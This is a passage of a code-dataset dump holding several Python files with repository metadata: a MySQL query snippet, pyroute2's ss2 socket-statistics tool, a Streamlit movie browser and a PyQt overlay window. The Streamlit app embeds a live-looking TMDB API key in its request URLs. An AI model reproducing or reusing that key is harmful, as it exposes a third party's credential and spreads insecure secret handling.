mysql.connector.connect(**config_11)\n query = 'SELECT acLotAreaName1, acLotAreaInfo FROM areadef'\n cursor = cnx.cursor()\n cursor.execute(query)\n for (acLotAreaName1, acLotAreaInfo) in cursor:\n print(\"{} - {}\".format(acLotAreaName1, acLotAreaInfo))\n cursor.close()\n\n for result in cnx.cmd_query_iter(query):\n if 'columns' in result:\n columns = result['columns']\n rows = cnx.get_rows()\n print(\"columns = {}\\nrows = {}\".format(columns, rows))\n else:\n print(\"Nothing data...\");\n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n else:\n cnx.close()\n\n", "repo_name": "somestory/ao2o_scheduler", "sub_path": "site_sync.py", "file_name": "site_sync.py", "file_ext": "py", "file_size_in_byte": 6503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "database.mysql.Mysql", "line_number": 50, "usage_type": "call"}, {"api_name": "database.mssql.Mssql", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pytz.utc", "line_number": 58, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "attribute"}, {"api_name": "mysql.connector.connector.connect", "line_number": 154, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 154, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 154, "usage_type": "name"}, {"api_name": "mysql.connector.connector", "line_number": 170, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 170, "usage_type": "name"}, {"api_name": "mysql.connector.errorcode.ER_ACCESS_DENIED_ERROR", "line_number": 171, "usage_type": "attribute"}, {"api_name": "mysql.connector.errorcode", "line_number": 171, "usage_type": "name"}, {"api_name": "mysql.connector.errorcode.ER_BAD_DB_ERROR", "line_number": 173, "usage_type": "attribute"}, {"api_name": "mysql.connector.errorcode", "line_number": 173, "usage_type": "name"}]} +{"seq_id": "9415321636", "text": "import argparse\nimport json\nimport os\nimport re\nimport socket\nfrom socket import AF_INET, AF_UNIX\n\ntry:\n import psutil\nexcept ImportError:\n psutil = None\nfrom pyroute2.netlink.diag import (\n SS_ALL,\n SS_CLOSE,\n SS_CLOSE_WAIT,\n SS_CLOSING,\n SS_CONN,\n SS_ESTABLISHED,\n SS_FIN_WAIT1,\n SS_FIN_WAIT2,\n SS_LAST_ACK,\n SS_LISTEN,\n SS_SYN_RECV,\n SS_SYN_SENT,\n SS_TIME_WAIT,\n UDIAG_SHOW_NAME,\n UDIAG_SHOW_PEER,\n UDIAG_SHOW_VFS,\n DiagSocket,\n)\n\ntry:\n from collections.abc import Callable, Mapping\nexcept ImportError:\n from collections import Callable, Mapping\n# UDIAG_SHOW_ICONS,\n# UDIAG_SHOW_RQLEN,\n# UDIAG_SHOW_MEMINFO\n\n\nclass UserCtxtMap(Mapping):\n _data = {}\n\n _sk_inode_re = re.compile(r\"socket:\\[(?P\\d+)\\]\")\n\n _proc_sk_fd_cast = \"/proc/%d/fd/%d\"\n\n _BUILD_RECURS_PATH = [\"inode\", \"usr\", \"pid\", \"fd\"]\n\n def _parse_inode(self, sconn):\n sk_path = self._proc_sk_fd_cast % (sconn.pid, sconn.fd)\n inode = None\n\n sk_inode_raw = os.readlink(sk_path)\n inode = self._sk_inode_re.search(sk_inode_raw).group(\"ino\")\n\n if not inode:\n raise RuntimeError(\"Unexpected kernel sk inode outline\")\n\n return inode\n\n def __recurs_enter(\n self,\n _sk_inode=None,\n _sk_fd=None,\n _usr=None,\n _pid=None,\n _ctxt=None,\n _recurs_path=[],\n ):\n step = _recurs_path.pop(0)\n\n if self._BUILD_RECURS_PATH[0] == step:\n if _sk_inode not in self._data.keys():\n self._data[_sk_inode] = {}\n\n elif self._BUILD_RECURS_PATH[1] == step:\n if _usr not in self._data[_sk_inode].keys():\n self._data[_sk_inode][_usr] = {}\n\n elif self._BUILD_RECURS_PATH[2] == step:\n if _pid not in self._data[_sk_inode][_usr].keys():\n self._data[_sk_inode][_usr].__setitem__(_pid, _ctxt)\n\n elif self._BUILD_RECURS_PATH[3] == step:\n self._data[_sk_inode][_usr][_pid][\"fds\"].append(_sk_fd)\n\n # end recursion\n return\n else:\n raise RuntimeError(\"Unexpected step in recursion\")\n\n # descend\n self.__recurs_enter(\n _sk_inode=_sk_inode,\n _sk_fd=_sk_fd,\n _usr=_usr,\n _pid=_pid,\n _ctxt=_ctxt,\n _recurs_path=_recurs_path,\n )\n\n def _enter_item(self, usr, flow, ctxt):\n if not flow.pid:\n # corner case of eg anonnymous AddressFamily.AF_UNIX\n # sockets\n return\n\n sk_inode = int(self._parse_inode(flow))\n sk_fd = flow.fd\n\n recurs_path = list(self._BUILD_RECURS_PATH)\n\n self.__recurs_enter(\n _sk_inode=sk_inode,\n _sk_fd=sk_fd,\n _usr=usr,\n _pid=flow.pid,\n _ctxt=ctxt,\n _recurs_path=recurs_path,\n )\n\n def _build(self):\n for flow in psutil.net_connections(kind=\"all\"):\n try:\n proc = psutil.Process(flow.pid)\n usr = proc.username()\n\n ctxt = {\n \"cmd\": proc.exe(),\n \"full_cmd\": proc.cmdline(),\n \"fds\": [],\n }\n\n self._enter_item(usr, flow, ctxt)\n except (FileNotFoundError, AttributeError, psutil.NoSuchProcess):\n # Handling edge case of race condition between build and parse\n # time. That's for very volatile, shortlived flows that can\n # exist during build but are gone once we want to parse the\n # inode.\n pass\n\n def __init__(self):\n self._build()\n\n def __getitem__(self, key):\n return self._data[key]\n\n def __len__(self):\n return len(self._data.keys())\n\n def __delitem__(self, key):\n raise RuntimeError(\"Not implemented\")\n\n def __iter__(self):\n raise RuntimeError(\"Not implemented\")\n\n\nclass Protocol(Callable):\n class Resolver:\n @staticmethod\n def getHost(ip):\n try:\n data = socket.gethostbyaddr(ip)\n host = str(data[0])\n return host\n except Exception:\n # gracefully\n return None\n\n def __init__(self, sk_states, fmt=\"json\"):\n self._states = sk_states\n\n fmter = \"_fmt_%s\" % fmt\n self._fmt = getattr(self, fmter, None)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n raise RuntimeError(\"not implemented\")\n\n def _fmt_json(self, refined_stats):\n return json.dumps(refined_stats, indent=4)\n\n\nclass UNIX(Protocol):\n def __init__(self, sk_states=SS_CONN, _fmt=\"json\"):\n super(UNIX, self).__init__(sk_states, fmt=_fmt)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n sstats = nl_diag_sk.get_sock_stats(\n states=self._states,\n family=AF_UNIX,\n show=(UDIAG_SHOW_NAME | UDIAG_SHOW_VFS | UDIAG_SHOW_PEER),\n )\n refined_stats = self._refine_diag_raw(sstats, usr_ctxt)\n printable = self._fmt(refined_stats)\n\n print(printable)\n\n def _refine_diag_raw(self, raw_stats, usr_ctxt):\n refined = {\"UNIX\": {\"flows\": []}}\n\n def vfs_cb(raw_val):\n out = {}\n out[\"inode\"] = raw_val[\"udiag_vfs_ino\"]\n out[\"dev\"] = raw_val[\"udiag_vfs_dev\"]\n\n return out\n\n k_idx = 0\n val_idx = 1\n cb_idx = 1\n\n idiag_attr_refine_map = {\n \"UNIX_DIAG_NAME\": (\"path_name\", None),\n \"UNIX_DIAG_VFS\": (\"vfs\", vfs_cb),\n \"UNIX_DIAG_PEER\": (\"peer_inode\", None),\n \"UNIX_DIAG_SHUTDOWN\": (\"shutdown\", None),\n }\n\n for raw_flow in raw_stats:\n vessel = {}\n vessel[\"inode\"] = raw_flow[\"udiag_ino\"]\n\n for attr in raw_flow[\"attrs\"]:\n attr_k = attr[k_idx]\n attr_val = attr[val_idx]\n k = idiag_attr_refine_map[attr_k][k_idx]\n cb = idiag_attr_refine_map[attr_k][cb_idx]\n\n if cb:\n attr_val = cb(attr_val)\n\n vessel[k] = attr_val\n\n refined[\"UNIX\"][\"flows\"].append(vessel)\n\n if usr_ctxt:\n for flow in refined[\"UNIX\"][\"flows\"]:\n try:\n sk_inode = flow[\"inode\"]\n flow[\"usr_ctxt\"] = usr_ctxt[sk_inode]\n except KeyError:\n # might define sentinel val\n pass\n\n return refined\n\n\nclass TCP(Protocol):\n INET_DIAG_MEMINFO = 1\n INET_DIAG_INFO = 2\n INET_DIAG_VEGASINFO = 3\n INET_DIAG_CONG = 4\n\n def __init__(self, sk_states=SS_CONN, _fmt=\"json\"):\n super(TCP, self).__init__(sk_states, fmt=_fmt)\n\n IDIAG_EXT_FLAGS = [\n self.INET_DIAG_MEMINFO,\n self.INET_DIAG_INFO,\n self.INET_DIAG_VEGASINFO,\n self.INET_DIAG_CONG,\n ]\n\n self.ext_f = 0\n for f in IDIAG_EXT_FLAGS:\n self.ext_f |= 1 << (f - 1)\n\n def __call__(self, nl_diag_sk, args, usr_ctxt):\n sstats = nl_diag_sk.get_sock_stats(\n states=self._states, family=AF_INET, extensions=self.ext_f\n )\n refined_stats = self._refine_diag_raw(sstats, args.resolve, usr_ctxt)\n printable = self._fmt(refined_stats)\n\n print(printable)\n\n def _refine_diag_raw(self, raw_stats, do_resolve, usr_ctxt):\n refined = {\"TCP\": {\"flows\": []}}\n\n idiag_refine_map = {\n \"src\": \"idiag_src\",\n \"dst\": \"idiag_dst\",\n \"src_port\": \"idiag_sport\",\n \"dst_port\": \"idiag_dport\",\n \"inode\": \"idiag_inode\",\n \"iface_idx\": \"idiag_if\",\n \"retrans\": \"idiag_retrans\",\n }\n\n for raw_flow in raw_stats:\n vessel = {}\n for k1, k2 in idiag_refine_map.items():\n vessel[k1] = raw_flow[k2]\n\n for ext_bundle in raw_flow[\"attrs\"]:\n vessel = self._refine_extension(vessel, ext_bundle)\n\n refined[\"TCP\"][\"flows\"].append(vessel)\n\n if usr_ctxt:\n for flow in refined[\"TCP\"][\"flows\"]:\n try:\n sk_inode = flow[\"inode\"]\n flow[\"usr_ctxt\"] = usr_ctxt[sk_inode]\n except KeyError:\n # might define sentinel val\n pass\n\n if do_resolve:\n for flow in refined[\"TCP\"][\"flows\"]:\n src_host = Protocol.Resolver.getHost(flow[\"src\"])\n if src_host:\n flow[\"src_host\"] = src_host\n\n dst_host = Protocol.Resolver.getHost(flow[\"dst\"])\n if dst_host:\n flow[\"dst_host\"] = dst_host\n\n return refined\n\n def _refine_extension(self, vessel, raw_ext):\n k, content = raw_ext\n ext_refine_map = {\n \"meminfo\": {\n \"r\": \"idiag_rmem\",\n \"w\": \"idiag_wmem\",\n \"f\": \"idiag_fmem\",\n \"t\": \"idiag_tmem\",\n }\n }\n\n if k == \"INET_DIAG_MEMINFO\":\n mem_k = \"meminfo\"\n vessel[mem_k] = {}\n for k1, k2 in ext_refine_map[mem_k].items():\n vessel[mem_k][k1] = content[k2]\n\n elif k == \"INET_DIAG_CONG\":\n vessel[\"cong_algo\"] = content\n\n elif k == \"INET_DIAG_INFO\":\n vessel = self._refine_tcp_info(vessel, content)\n\n elif k == \"INET_DIAG_SHUTDOWN\":\n pass\n\n return vessel\n\n # interim approach\n # tcpinfo call backs\n class InfoCbCore:\n # normalizer\n @staticmethod\n def rto_n_cb(key, value, **ctx):\n out = None\n if value != 3000000:\n out = value / 1000.0\n\n return out\n\n @staticmethod\n def generic_1k_n_cb(key, value, **ctx):\n return value / 1000.0\n\n # predicates\n @staticmethod\n def snd_thresh_p_cb(key, value, **ctx):\n if value < 0xFFFF:\n return value\n\n return None\n\n @staticmethod\n def rtt_p_cb(key, value, **ctx):\n tcp_info_raw = ctx[\"raw\"]\n\n try:\n if (\n tcp_info_raw[\"tcpv_enabled\"] != 0\n and tcp_info_raw[\"tcpv_rtt\"] != 0x7FFFFFFF\n ):\n return tcp_info_raw[\"tcpv_rtt\"]\n except KeyError:\n # ill practice, yet except quicker path\n pass\n\n return tcp_info_raw[\"tcpi_rtt\"] / 1000.0\n\n # converter\n @staticmethod\n def state_c_cb(key, value, **ctx):\n state_str_map = {\n SS_ESTABLISHED: \"established\",\n SS_SYN_SENT: \"syn-sent\",\n SS_SYN_RECV: \"syn-recv\",\n SS_FIN_WAIT1: \"fin-wait-1\",\n SS_FIN_WAIT2: \"fin-wait-2\",\n SS_TIME_WAIT: \"time-wait\",\n SS_CLOSE: \"unconnected\",\n SS_CLOSE_WAIT: \"close-wait\",\n SS_LAST_ACK: \"last-ack\",\n SS_LISTEN: \"listening\",\n SS_CLOSING: \"closing\",\n }\n\n return state_str_map[value]\n\n @staticmethod\n def opts_c_cb(key, value, **ctx):\n tcp_info_raw = ctx[\"raw\"]\n\n # tcp_info opt flags\n TCPI_OPT_TIMESTAMPS = 1\n TCPI_OPT_SACK = 2\n TCPI_OPT_ECN = 8\n\n out = []\n\n opts = tcp_info_raw[\"tcpi_options\"]\n if opts & TCPI_OPT_TIMESTAMPS:\n out.append(\"ts\")\n if opts & TCPI_OPT_SACK:\n out.append(\"sack\")\n if opts & TCPI_OPT_ECN:\n out.append(\"ecn\")\n\n return out\n\n def _refine_tcp_info(self, vessel, tcp_info_raw):\n ti = TCP.InfoCbCore\n\n info_refine_tabl = {\n \"tcpi_state\": (\"state\", ti.state_c_cb),\n \"tcpi_pmtu\": (\"pmtu\", None),\n \"tcpi_retrans\": (\"retrans\", None),\n \"tcpi_ato\": (\"ato\", ti.generic_1k_n_cb),\n \"tcpi_rto\": (\"rto\", ti.rto_n_cb),\n # TODO consider wscale baking\n \"tcpi_snd_wscale\": (\"snd_wscale\", None),\n \"tcpi_rcv_wscale\": (\"rcv_wscale\", None),\n # TODO bps baking\n \"tcpi_snd_mss\": (\"snd_mss\", None),\n \"tcpi_snd_cwnd\": (\"snd_cwnd\", None),\n \"tcpi_snd_ssthresh\": (\"snd_ssthresh\", ti.snd_thresh_p_cb),\n # TODO consider rtt agglomeration - needs nesting\n \"tcpi_rtt\": (\"rtt\", ti.rtt_p_cb),\n \"tcpi_rttvar\": (\"rttvar\", ti.generic_1k_n_cb),\n \"tcpi_rcv_rtt\": (\"rcv_rtt\", ti.generic_1k_n_cb),\n \"tcpi_rcv_space\": (\"rcv_space\", None),\n \"tcpi_options\": (\"opts\", ti.opts_c_cb),\n # unclear, NB not in use by iproute2 ss latest\n \"tcpi_last_data_sent\": (\"last_data_sent\", None),\n \"tcpi_rcv_ssthresh\": (\"rcv_ssthresh\", None),\n \"tcpi_rcv_ssthresh\": (\"rcv_ssthresh\", None),\n \"tcpi_segs_in\": (\"segs_in\", None),\n \"tcpi_segs_out\": (\"segs_out\", None),\n \"tcpi_data_segs_in\": (\"data_segs_in\", None),\n \"tcpi_data_segs_out\": (\"data_segs_out\", None),\n \"tcpi_lost\": (\"lost\", None),\n \"tcpi_notsent_bytes\": (\"notsent_bytes\", None),\n \"tcpi_rcv_mss\": (\"rcv_mss\", None),\n \"tcpi_pacing_rate\": (\"pacing_rate\", None),\n \"tcpi_retransmits\": (\"retransmits\", None),\n \"tcpi_min_rtt\": (\"min_rtt\", None),\n \"tcpi_rwnd_limited\": (\"rwnd_limited\", None),\n \"tcpi_max_pacing_rate\": (\"max_pacing_rate\", None),\n \"tcpi_probes\": (\"probes\", None),\n \"tcpi_reordering\": (\"reordering\", None),\n \"tcpi_last_data_recv\": (\"last_data_recv\", None),\n \"tcpi_bytes_received\": (\"bytes_received\", None),\n \"tcpi_fackets\": (\"fackets\", None),\n \"tcpi_last_ack_recv\": (\"last_ack_recv\", None),\n \"tcpi_last_ack_sent\": (\"last_ack_sent\", None),\n \"tcpi_unacked\": (\"unacked\", None),\n \"tcpi_sacked\": (\"sacked\", None),\n \"tcpi_bytes_acked\": (\"bytes_acked\", None),\n \"tcpi_delivery_rate_app_limited\": (\n \"delivery_rate_app_limited\",\n None,\n ),\n \"tcpi_delivery_rate\": (\"delivery_rate\", None),\n \"tcpi_sndbuf_limited\": (\"sndbuf_limited\", None),\n \"tcpi_ca_state\": (\"ca_state\", None),\n \"tcpi_busy_time\": (\"busy_time\", None),\n \"tcpi_total_retrans\": (\"total_retrans\", None),\n \"tcpi_advmss\": (\"advmss\", None),\n \"tcpi_backoff\": (None, None),\n \"tcpv_enabled\": (None, \"skip\"),\n \"tcpv_rttcnt\": (None, \"skip\"),\n \"tcpv_rtt\": (None, \"skip\"),\n \"tcpv_minrtt\": (None, \"skip\"),\n # BBR\n \"bbr_bw_lo\": (\"bbr_bw_lo\", None),\n \"bbr_bw_hi\": (\"bbr_bw_hi\", None),\n \"bbr_min_rtt\": (\"bbr_min_rtt\", None),\n \"bbr_pacing_gain\": (\"bbr_pacing_gain\", None),\n \"bbr_cwnd_gain\": (\"bbr_cwnd_gain\", None),\n # DCTCP\n \"dctcp_enabled\": (\"dctcp_enabled\", None),\n \"dctcp_ce_state\": (\"dctcp_ce_state\", None),\n \"dctcp_alpha\": (\"dctcp_alpha\", None),\n \"dctcp_ab_ecn\": (\"dctcp_ab_ecn\", None),\n \"dctcp_ab_tot\": (\"dctcp_ab_tot\", None),\n }\n k_idx = 0\n cb_idx = 1\n\n info_k = \"tcp_info\"\n vessel[info_k] = {}\n\n # BUG - pyroute2 diag - seems always last info instance from kernel\n if type(tcp_info_raw) != str:\n for k, v in tcp_info_raw.items():\n if k not in info_refine_tabl:\n continue\n refined_k = info_refine_tabl[k][k_idx]\n cb = info_refine_tabl[k][cb_idx]\n refined_v = v\n if cb and cb == \"skip\":\n continue\n elif cb:\n ctx = {\"raw\": tcp_info_raw}\n refined_v = cb(k, v, **ctx)\n\n vessel[info_k][refined_k] = refined_v\n\n return vessel\n\n\ndef prepare_args():\n parser = argparse.ArgumentParser(\n description=\"\"\"\n ss2 - socket statistics depictor meant as\n a complete and convenient surrogate for\n iproute2/misc/ss2\"\"\"\n )\n parser.add_argument(\n \"-x\",\n \"--unix\",\n help=\"Display Unix domain sockets.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-t\", \"--tcp\", help=\"Display TCP sockets.\", action=\"store_true\"\n )\n parser.add_argument(\n \"-l\",\n \"--listen\",\n help=\"Display listening sockets.\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-a\", \"--all\", help=\"Display all sockets.\", action=\"store_true\"\n )\n parser.add_argument(\n \"-p\",\n \"--process\",\n help=\"show socket holding context\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-r\",\n \"--resolve\",\n help=\"resolve host names in addition\",\n action=\"store_true\",\n )\n\n args = parser.parse_args()\n\n return args\n\n\ndef run(args=None):\n if psutil is None:\n raise RuntimeError(\"ss2 requires python-psutil >= 5.0 to run\")\n\n if not args:\n args = prepare_args()\n\n _states = SS_CONN\n if args.listen:\n _states = 1 << SS_LISTEN\n if args.all:\n _states = SS_ALL\n\n protocols = []\n if args.tcp:\n protocols.append(TCP(sk_states=_states))\n\n if args.unix:\n protocols.append(UNIX(sk_states=_states))\n\n if not protocols:\n raise RuntimeError(\"not implemented - ss2 in fledging mode\")\n\n _user_ctxt_map = None\n if args.process:\n _user_ctxt_map = UserCtxtMap()\n\n with DiagSocket() as ds:\n ds.bind()\n for p in protocols:\n p(ds, args, _user_ctxt_map)\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "svinota/pyroute2", "sub_path": "pyroute2/netlink/diag/ss2.py", "file_name": "ss2.py", "file_ext": "py", "file_size_in_byte": 18071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 888, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Mapping", "line_number": 41, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.readlink", "line_number": 54, "usage_type": "call"}, {"api_name": "psutil.net_connections", "line_number": 124, "usage_type": "call"}, {"api_name": "psutil.Process", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.NoSuchProcess", "line_number": 136, "usage_type": "attribute"}, {"api_name": "collections.Callable", "line_number": 159, "usage_type": "name"}, {"api_name": "socket.gethostbyaddr", "line_number": 164, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 181, "usage_type": "call"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 185, "usage_type": "name"}, {"api_name": "socket.AF_UNIX", "line_number": 191, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_NAME", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_VFS", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.UDIAG_SHOW_PEER", "line_number": 192, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 255, "usage_type": "name"}, {"api_name": "socket.AF_INET", "line_number": 271, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_ESTABLISHED", "line_number": 394, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_SYN_SENT", "line_number": 395, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_SYN_RECV", "line_number": 396, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_FIN_WAIT1", "line_number": 397, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_FIN_WAIT2", "line_number": 398, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_TIME_WAIT", "line_number": 399, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSE", "line_number": 400, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSE_WAIT", "line_number": 401, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LAST_ACK", "line_number": 402, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LISTEN", "line_number": 403, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_CLOSING", "line_number": 404, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 532, "usage_type": "call"}, {"api_name": "pyroute2.netlink.diag.SS_CONN", "line_number": 581, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_LISTEN", "line_number": 583, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.SS_ALL", "line_number": 585, "usage_type": "name"}, {"api_name": "pyroute2.netlink.diag.DiagSocket", "line_number": 601, "usage_type": "call"}]} +{"seq_id": "73201168193", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport requests as requests\n\nst.write(\"Top Movies \")\n\n\n# DATE_COLUMN = 'date/time'\n# DATA_URL = ('https://s3-us-west-2.amazonaws.com/'\n# 'streamlit-demo-data/uber-raw-data-sep14.csv.gz')\n\n\n# @st.cache\n# def load_data(nrows):\n# data = pd.read_csv(DATA_URL, nrows=nrows)\n# def lowercase(x): return str(x).lower()\n# data.rename(lowercase, axis='columns', inplace=True)\n# data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\n# return data\n\n\n# data_load_state = st.text('Loading data...')\n# data = load_data(10000)\n# data_load_state.text(\"Done! (using st.cache)\")\n\n# if st.checkbox('Show raw data'):\n# st.subheader('Raw data')\n# st.write(data)\n\n# st.subheader('Number of pickups by hour')\n# hist_values = np.histogram(\n# data[DATE_COLUMN].dt.hour, bins=24, range=(0, 24))[0]\n# st.bar_chart(hist_values)\n\n# # Some number in the range 0-23\n# hour_to_filter = st.slider('hour', 0, 23, 17)\n# filtered_data = data[data[DATE_COLUMN].dt.hour == hour_to_filter]\n\n# st.subheader('Map of all pickups at %s:00' % hour_to_filter)\n# st.map(filtered_data)\n\n\n\n# fetch movies list from the API\nresponse = requests.get(\n 'https://api.themoviedb.org/3/movie/popular?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US&page=1')\nmovies = response.json()['results']\n\n# get movie genres\ngenre_response = requests.get(\n 'https://api.themoviedb.org/3/genre/movie/list?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US')\ngenres = genre_response.json()['genres']\n\n\n# build a dictionary of genres\ngenres_dict = {}\nfor genre in genres:\n genres_dict[genre['id']] = genre['name']\n\n\n# create sidebar with movie genre selection\ngenre_list = list(genres_dict.values())\nselected_genre = st.sidebar.multiselect('Genre', genre_list)\n\n\n\n# display top movie as hero banner\n\n# st.write(\"Trending Movie \")\n# st.title(movies[0]['title'])\n# st.markdown('**Popularity:** ' + str(movies[0]['popularity']))\n# st.markdown('**Vote Average:** ' + str(movies[0]['vote_average']))\n# st.markdown('**Release Date:** ' + str(movies[0]['release_date']))\n# st.markdown('**Overview:** ' + str(movies[0]['overview']))\n# st.image('https://image.tmdb.org/t/p/w500' + movies[0]['poster_path'])\n\n# filter movies by selected genre in one line \n@st.cache\ndef filter_movies(movies, genres):\n filtered_movies = []\n for movie in movies:\n movie_genre_ids = movie['genre_ids']\n movie_genres = []\n for genre_id in movie_genre_ids:\n movie_genres.append(genres_dict[genre_id])\n if set(movie_genres).intersection(set(genres)):\n filtered_movies.append(movie)\n return filtered_movies\n\n\ndata_load_state = st.text('Loading data...')\n\n\n# display movies with image, title and genre as small cards in one line\nif selected_genre:\n movies = filter_movies(movies, selected_genre)\nfor movie in movies:\n col1, col2, col3 = st.columns(3)\n with col1:\n st.write(movie['title'])\n st.image('https://image.tmdb.org/t/p/w500' +\n movie['poster_path'])\n\n \n \n with col2:\n st.write(movie['overview'])\n\n# display movie trailers on button click\n\n\n if st.button('Trailer', key=movie['id']):\n trailer_response = requests.get('https://api.themoviedb.org/3/movie/' + str(movie['id']) + '/videos?api_key=d9604e1674b0955abd840336ad75a8e5&language=en-US')\n trailer = trailer_response.json()['results'][0]\n st.video('https://www.youtube.com/watch?v=' + trailer['key'])\n\n\n\n\n\n\n# dislay movie per genre\n# for genre in selected_genre:\n# st.write(genre)\n# for movie in movies:\n# movie_genre_ids = movie['genre_ids']\n# movie_genres = []\n# for genre_id in movie_genre_ids:\n# movie_genres.append(genres_dict[genre_id])\n# if genre in movie_genres:\n# st.write(movie['title'])\n# st.image('https://image.tmdb.org/t/p/w500' + movie['poster_path'])\n# st.write(movie['overview'])\n# st.write(movie['release_date'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n# # create a list of movie titles and images for each movie\n# movie_titles = [movie['title'] for movie in movies]\n# movie_images = [movie['poster_path'] for movie in movies]\n\n# # create a dictionary of movie titles and images\n# movie_dict = dict(zip(movie_titles, movie_images))\n\n# # display the movie titles as a dropdown\n# movie = st.selectbox('Select a movie', movie_titles)\n\n# # display the movie image\n# st.image('https://image.tmdb.org/t/p/w500/' + movie_dict[movie])\n\n\n# # create a sidebar of movie titles and images\n# st.sidebar.header('Top Movies')\n# for movie in movies:\n# st.sidebar.image('https://image.tmdb.org/t/p/w500/' + movie['poster_path'], width=100)\n# st.sidebar.write(movie['title'])\n\n\n\n\n# # go through the list and display movies as cards in a grid columns and make them clickable\n# for movie in movies:\n# col1, col2, col3 = st.columns(3)\n# with col1:\n# st.image('https://image.tmdb.org/t/p/w500/' + movie['poster_path'])\n# with col2:\n# st.write(movie['title'])\n# with col3:\n# st.write(movie['overview'])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "dev-ted/steamlit-movie-app", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.write", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 64, "usage_type": "attribute"}, {"api_name": "streamlit.cache", "line_number": 79, "usage_type": "attribute"}, {"api_name": "streamlit.text", "line_number": 92, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 99, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 102, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 108, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "streamlit.video", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "23911314812", "text": "from PyQt6.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QGraphicsOpacityEffect\r\nfrom PyQt6.QtCore import *\r\nfrom PyQt6.QtGui import QFont\r\nfrom BlurWindow.blurWindow import GlobalBlur\r\nfrom .. import storage\r\nfrom . import app\r\n\r\n\r\nclass Window(QWidget):\r\n def __init__(self):\r\n super(Window, self).__init__()\r\n conf = storage.setting['mouse']\r\n size = app.primaryScreen().size()\r\n\r\n self.setWindowTitle('Visualizer')\r\n self.setWindowFlags(\r\n Qt.WindowType.Tool |\r\n Qt.WindowType.X11BypassWindowManagerHint |\r\n Qt.WindowType.CustomizeWindowHint |\r\n Qt.WindowType.WindowStaysOnTopHint |\r\n Qt.WindowType.FramelessWindowHint\r\n )\r\n self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)\r\n self.setAttribute(Qt.WidgetAttribute.WA_TransparentForMouseEvents, True)\r\n self.setAttribute(Qt.WidgetAttribute.WA_NoChildEventsForParent, True)\r\n GlobalBlur(self.winId(), Dark=True, QWidget=self)\r\n\r\n\r\nGUI = Window()\r\n", "repo_name": "ltndat/key-cast-visualizer", "sub_path": "app/ui/mouse.py", "file_name": "mouse.py", "file_ext": "py", "file_size_in_byte": 992, "program_lang": "python", "lang": "en", "doc_type": "code", 